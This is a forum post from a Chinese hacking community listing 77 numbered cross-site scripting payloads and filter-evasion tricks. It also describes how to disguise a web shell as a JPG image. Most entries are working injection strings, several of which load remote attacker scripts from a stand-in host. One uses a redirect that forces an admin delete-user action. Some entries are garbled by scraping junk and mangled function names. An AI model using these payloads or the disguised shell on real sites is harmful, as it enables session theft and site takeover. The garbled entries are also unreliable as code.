找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2170|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell( V/ X/ c( L6 j1 ~  |$ c: S
XSS跨站代码  <script>alert("")</script>  E% i8 v: D0 ], k' {' [5 G! U
% A6 C+ M  P: h: f* Y
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马* |* u( ~8 Z3 F! Y+ i
0 j) N. d% _* o) L6 \- {4 j

) u- F# I8 [/ o; I' |0 f: u4 \* d& C" D8 x& c" b. Q
1)普通的XSS JavaScript注入
, ]3 ?& Q& }9 O0 P<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; W& O, X- i$ H8 a

+ P; d0 w* y+ J  Y7 m+ d: `(2)IMG标签XSS使用JavaScript命令
/ K, }2 g9 t$ q0 c<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 C3 a- }2 a6 r

4 I3 k0 U0 E# j' M+ w- J$ H5 S4 H(3)IMG标签无分号无引号
# q# j$ K1 R# o  d3 L$ T6 N- T<IMG SRC=javascript:alert(‘XSS’)>; p6 `2 a3 W3 W' X& v
, U4 l- q: _8 \
(4)IMG标签大小写不敏感
2 o: B. k! G; R. Q5 ~1 o9 `<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 L0 ]3 E; I2 S* E& O1 G
8 i5 M$ O9 k9 q8 L2 c% g- i* h* P0 K. S
(5)HTML编码(必须有分号)# ^; i+ s7 Y% T0 ~6 c, {1 Z( _
<IMG SRC=javascript:alert(“XSS”)>: y0 u) ]$ Y5 R7 V

" V" a+ q9 [- J0 O0 D(6)修正缺陷IMG标签
$ W7 z- B5 }; P<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
: E9 G2 k1 S4 j$ h0 C0 D  A  {' U% O4 l- x
(7)formCharCode标签(计算器)
+ F# v6 C3 U1 Q* a' C<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- @/ u) J# L; ~8 e
4 G$ n$ w, ?4 g0 }& H(8)UTF-8的Unicode编码(计算器)3 s2 ^0 [! Y' I8 i& z
<IMG SRC=jav..省略..S')>
1 g& r' X/ `0 e# O3 U5 y  N0 `0 M1 {5 L, E1 k. ~
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ U, I* [1 j1 q$ L
<IMG SRC=jav..省略..S')>
( d9 @+ c& p/ R, ^) N* c2 i5 g0 p4 h; y
(10)十六进制编码也是没有分号(计算器)% s8 l! T* B/ Z. I* q
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
& n' x9 \' h. ~% n7 `& P/ G+ U7 H
7 ?6 J3 W/ ]# @(11)嵌入式标签,将Javascript分开! Q; d" g# o7 n5 e
<IMG SRC=”jav ascript:alert(‘XSS’);”>* g) K1 ^+ T1 c7 x, r6 T% x
9 @$ G4 u# n0 X, V
(12)嵌入式编码标签,将Javascript分开" l4 w0 ~: ^: E5 s
<IMG SRC=”jav ascript:alert(‘XSS’);”>; }8 v5 t) p) X+ E8 r

# o7 R* r* Y9 B5 ]' g* C* ^/ B(13)嵌入式换行符
2 a5 J+ S: |' M<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ A- u; x9 r* I  j# e' L
, M3 L) i# d+ X(14)嵌入式回车* \  d: _; X* ]$ q
<IMG SRC=”jav ascript:alert(‘XSS’);”># i( B+ ^& k( w7 j3 ~+ Y0 u, R

4 r/ [* k! l, ~' i8 P$ v+ m(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 A8 r% D% }* N  U' \* t: z; z<IMG SRC=”javascript:alert(‘XSS‘)”>
3 R! L, s  x, {2 Y
7 j8 V  n8 J, {1 H9 c: [(16)解决限制字符(要求同页面)2 {/ q( x: `  v1 x# r/ F
<script>z=’document.’</script>
7 g& U+ Q. Y: H* j<script>z=z+’write(“‘</script>
9 X2 a2 @1 n1 s- `/ d# K<script>z=z+’<script’</script>* A9 H& j* b& i4 R& h
<script>z=z+’ src=ht’</script>
" z# ^% X4 L  B2 N( g<script>z=z+’tp://ww’</script>+ i4 `- G5 H% [
<script>z=z+’w.shell’</script>. r& R* E, E9 m$ g5 `
<script>z=z+’.net/1.’</script>
" X& r: n+ z/ w. t- |" b9 o' }<script>z=z+’js></sc’</script>
+ f0 T- t5 h& ]7 M<script>z=z+’ript>”)’</script>
! V7 X6 h: T$ p& r+ }<script>eval_r(z)</script>4 C" C. F8 ?( {, P3 E

" t) I9 ]7 C) `- t$ n( |& V(17)空字符
& D4 M' r: c% m( y( f& n) C& c' Tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# `/ r9 f' n! U9 x" W

! l/ \. Q% O$ p6 W; x$ @! ?" \(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用" I7 ~/ d3 \/ X2 S4 R0 W: h
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 I# N" s. U4 r* Q9 @3 I3 n. l( n( V
(19)Spaces和meta前的IMG标签
. [  m/ o' V3 z5 _! G; V8 U<IMG SRC=” javascript:alert(‘XSS’);”>. o6 X7 g# H( S8 _

& X/ w( O' J0 U3 p(20)Non-alpha-non-digit XSS
4 D5 \2 v( O6 y/ {! ?# P<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) [0 m3 c4 U/ @: e
4 Y! g1 y+ c; K% b/ Z(21)Non-alpha-non-digit XSS to 2. f; J) J* |* [$ \: d1 s! T
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 d9 B+ n$ V: B8 `2 [

/ O( W4 v. Y8 P8 B0 O- x" V(22)Non-alpha-non-digit XSS to 3
: _/ N# p! R8 M0 Q+ X<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ q1 f& ]+ m# R3 f

: \2 B& O6 O# d' \- `6 D5 L(23)双开括号7 t- ]- S5 u# T1 n6 f  \. X: z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ @6 M+ [) C$ h. v
3 e' d& z' V$ [(24)无结束脚本标记(仅火狐等浏览器)( w. c' c& q( @1 B0 ?0 A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. z+ R6 Y2 c( l8 H2 h. U2 f) Z

& d; ^0 B' e" x3 E8 ^9 p(25)无结束脚本标记2
6 _6 X4 n/ A3 ?& U5 O: r2 w<SCRIPT SRC=//3w.org/XSS/xss.js>! L& ]' @6 d( L
+ O6 E, b2 ]- p, @
(26)半开的HTML/JavaScript XSS: [3 W- l6 U6 Z
<IMG SRC=”javascript:alert(‘XSS’)”, }% P- a0 B& i1 E: o: @
. g& c! C  A1 @) }4 O
(27)双开角括号/ [, c' g  v. T
<iframe src=http://3w.org/XSS.html <. j; ?, Q9 H$ Y9 F" e; N

- i. U8 V# B1 r1 o(28)无单引号 双引号 分号* y& \0 X7 z( X) @6 L  g
<SCRIPT>a=/XSS/4 A$ O+ u% q7 S3 F# a
alert(a.source)</SCRIPT>
, {/ a6 n9 T5 N4 o2 }  j
/ @% {. P) C5 i0 E2 p* `(29)换码过滤的JavaScript
$ h2 R- `& z$ w( N4 ~\”;alert(‘XSS’);//
3 W; y+ d8 i" l+ `7 f8 ]7 d) o9 T9 c4 T4 O" {
(30)结束Title标签
4 n5 c0 L$ z& h7 E: r) U! W/ i</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 s% C7 ?1 B# ^2 w" R9 _

6 B1 J& Y, f; T1 ^* V7 }) M; O(31)Input Image  g4 j9 g! }  ^# u- }
<INPUT SRC=”javascript:alert(‘XSS’);”>: p3 j! @1 {* e! E

# Q; ~- x/ |0 k! d(32)BODY Image! H$ ?, R1 ]$ S2 j+ n6 e3 ~$ ?7 B
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 i3 `& \" E6 |  c' L4 D! `
3 ~/ J! P; N) X1 ]% d(33)BODY标签$ }( q: }- }! S3 V
<BODY(‘XSS’)>: m( V" M, k9 c0 w% N9 o# M

3 S( \9 ?" L% r. H8 c3 m; o" o, I9 o(34)IMG Dynsrc& Q7 \% ~  c: M/ W. a& Z; N
<IMG DYNSRC=”javascript:alert(‘XSS’)”># @7 u( [$ d' u* ?6 U$ F/ @

0 a# ^& T; }( R3 r- i0 _" T( e% N(35)IMG Lowsrc! O! ?7 [5 u9 l) x9 L
<IMG LOWSRC=”javascript:alert(‘XSS’)”>( N  z9 b9 B" E0 N+ {/ D! h
, f2 z) K/ B0 V* ]
(36)BGSOUND& l3 x5 G5 y. ?1 u
<BGSOUND SRC=”javascript:alert(‘XSS’);”>  G1 k' }3 {- s9 M' ]
& A0 C2 Z. B( T* I
(37)STYLE sheet
* ^1 r  v4 E8 s  i% b<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 o7 o  H0 r, C& T* ~1 [! V- u3 z( H; j7 u7 G. R
(38)远程样式表
2 o; q5 M  H9 l9 t3 ~! l<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>  ~  u$ |5 F8 c1 U+ J- n

9 q% k) ~' T# I, {+ n(39)List-style-image(列表式)
: c" |' v$ j& g' Z5 i<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 A+ R, ]' I* j$ g, l1 i
* E1 d; ]" u: o
(40)IMG VBscript: E7 x  t" m1 o; E" Y
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS" _0 o- l9 f5 [( w+ ^- R1 Y# ^$ i
0 E9 J+ h7 d: }0 v
(41)META链接url
% w& F' P! g* g<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
0 r# P- ^2 M, P5 T
. C! P/ G  ~/ n/ z(42)Iframe) g( B# \* A& ~: @- |
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 y" E/ {) }6 J, l# J5 L) Q. N(43)Frame! v0 W, _% u& y. c1 X& ~
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>7 h# k% t9 z; `; ~& S

5 N# Z3 y" z/ x) ~7 }% r% h(44)Table
% a( @6 x0 w2 A! z+ c<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! O& z. m& e* n' w! u$ t

7 M6 g8 P4 h! K4 s/ X. n1 I' }3 T(45)TD0 d2 Z# M7 w4 g. Q1 S. j9 O' A
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 K* B  |2 `$ D$ N) j
, C/ Y7 b3 {* H/ T/ B; g
(46)DIV background-image$ s; j1 v# M* [+ m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; H1 q# l* k* v2 W, o; @' i3 y$ n
, l1 }: H. g! I2 u- x+ d! }(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)4 f" h- A+ \5 Q$ B, M
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
5 t1 V2 i8 Y' F) g4 {" ?  @0 N# X' }" c( H& L+ W* ^* h8 q
(48)DIV expression
7 i0 S6 M: O8 g$ R7 O<DIV STYLE=”width: expression_r(alert(‘XSS’));”>, L. ?1 V  V) S4 h
4 w5 o9 u. ~2 U9 [5 [
(49)STYLE属性分拆表达1 P* a+ e& w; I- V( {$ j
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( x* w0 h: ^7 p: j% ]3 p/ _

; X" D  x7 }3 b- b(50)匿名STYLE(组成:开角号和一个字母开头); {8 C9 [! f2 \+ S5 i9 f6 ?1 @
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ i  P  q' F% ~4 i9 n) q/ _1 ^- x: S5 x; I" d1 U- {
(51)STYLE background-image) p, D4 O6 m  \7 h& p. K6 N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
, R: m6 j" `7 @( \3 `/ _
: k4 v9 a  B' m(52)IMG STYLE方式
* B! h; o$ _: J! B3 q; L8 b6 v0 m- ^exppression(alert(“XSS”))’>
" g( T4 i% l0 \/ z- z- a3 L6 |/ x2 x, C2 U8 L
(53)STYLE background0 e& l  |9 |! J8 E) e* G
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
4 q  i+ q+ G# Y' f% `# J
% V1 K/ K5 D" v* n(54)BASE* J) y! ?) n% t
<BASE HREF=”javascript:alert(‘XSS’);//”>
) f  s- b3 E2 e4 R5 x( ?" J- s9 _
0 q3 F/ Z4 w: Q# X* o7 a) Q3 O(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 }8 }# K+ X8 _) R' F  l& A6 n
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
1 U$ F8 t8 q2 w
# s+ h; q9 x+ o9 u, w7 L(56)在flash中使用ActionScrpt可以混进你XSS的代码
. h& @5 q; H; wa=”get”;
, v; @1 T+ B( o( {' T' Nb=”URL(\”";
* S3 W: N6 e6 e9 A0 [7 @! Pc=”javascript:”;
0 s) l: T$ W  a8 Dd=”alert(‘XSS’);\”)”;
( p2 S$ \! X# H% k! j' veval_r(a+b+c+d);
/ P9 d1 T) h/ Y5 L6 t0 M
% j# @9 o. w8 Z- E. A" \( c- y(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
6 k) ~/ N# [7 n<HTML xmlns:xss>: _0 t2 p6 {7 Y- `
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% K$ o- e" M, T& f2 C  L* K; C<xss:xss>XSS</xss:xss>; i; L- ]* q' f# b
</HTML>
) ~& p  {2 O  \' N" F
+ k+ i/ }0 c" O' W- V& R' x( C(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' _/ a" y: h0 H1 M7 y3 f: P& B<SCRIPT SRC=””></SCRIPT>! K: E! H4 Q' F, `+ f5 t% l- }

2 q& l) }: A( Q5 a4 f(59)IMG嵌入式命令,可执行任意命令
. N4 z8 \0 I0 _8 M7 A# i<IMG SRC=”http://www.XXX.com/a.php?a=b”>
. a) B( G1 {1 g6 N: G7 u- x2 z8 X' H2 m) s
(60)IMG嵌入式命令(a.jpg在同服务器)$ Z  Z9 M( q) L, C. f& D# S' J- u
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
/ L. U1 j, {4 h' X  h" ?4 a
/ o- B. q- m1 O. G: p, [(61)绕符号过滤
0 I) ~+ G4 H5 {7 s1 C. I' i$ U& A<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>  a8 L; X$ ?0 Q( P3 `9 w+ v$ ^

9 _& c. [9 M! x7 k+ }+ `6 V(62)
& e! W; N/ o) B: f<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>  u$ Q0 P0 }% k; g- [
( W3 b8 R& ^$ J# M
(63)
5 c* {9 d' B( R2 J6 z0 k<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ S- n& \# w0 ~
/ i3 }9 c4 n- ]! i
(64)
' B6 S( h# \+ w: _<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>: ~5 X- r7 X* d: q8 C, I

% X- w8 m; }2 t/ [- P1 x(65)
0 f, \1 \& W4 I& T* A: Q<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- v3 K* v' c8 ]! i) U

. ^: z* d  D  w0 D. H- B# b(66)* o) O! D% J& f; \- x
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
: W0 l8 `* h8 X3 A1 \7 m* O1 `) Z# [, f* N/ ]0 j  |) {; w, M, ?* \
(67): g* U0 |: T! w! Y( C) C1 Y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
3 w$ P" ^! m7 y, ~1 v% n  Q" Y- Q
8 b+ X  x. Y) z, d# |" o1 f3 A( p(68)URL绕行8 {2 g  j" w% _1 s; w" i
<A HREF=”http://127.0.0.1/”>XSS</A>" M# W' ^9 o/ W2 ]% u
; a9 @9 d+ y& K! K: @
(69)URL编码7 c1 K& a- G2 u9 T9 W3 \! p
<A HREF=”http://3w.org”>XSS</A>
* Z+ v" n( B7 `- k- Y! f( C/ U" |
* U2 U' I/ `6 {2 o(70)IP十进制
) _2 @  R) [4 ^- |- P7 a<A HREF=”http://3232235521″>XSS</A>. I; P/ j9 D) Y# M4 E! U

% y" t; N6 m$ e4 `" J  p& M(71)IP十六进制4 j6 a0 ?2 {- q. ^1 j/ ]) x) c5 H8 {
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
( h- @: ?9 E# A  a, p
1 a8 D% G% s6 S# c6 ~(72)IP八进制# R0 _: z8 c) W- t
<A HREF=”http://0300.0250.0000.0001″>XSS</A>. m& B5 Z7 F/ O
% s, Y/ n9 Y1 J8 h+ _0 ]
(73)混合编码' [6 Q+ v" o- N3 W8 H( Q/ I/ p
<A HREF=”h
- j' F4 W4 `4 B7 A& @tt p://6 6.000146.0×7.147/”">XSS</A>" X% }, C: a  b& p6 ^  b: a

/ D0 G0 U2 L0 a(74)节省[http:]) r: |6 `6 S4 Z( d
<A HREF=”//www.google.com/”>XSS</A>
0 K- K+ j6 J- n1 K' ^: T- `1 }8 q$ l) L5 Q
(75)节省[www]
. {' P0 G8 R+ o2 B9 O9 ]& w6 K<A HREF=”http://google.com/”>XSS</A>' H4 O9 D% m' j% k

: j' G- C  ^' o" L. [1 D(76)绝对点绝对DNS, G# g2 q' T% |9 x
<A HREF=”http://www.google.com./”>XSS</A>
  k& C3 m' M% U5 k! N/ c# o0 |  M0 ^  P' H5 Q# ~9 i& _/ T& c+ r  r6 Z+ K( ~
(77)javascript链接
( F# S; b! y( ^1 H<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
+ ]  d  [! Z% ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表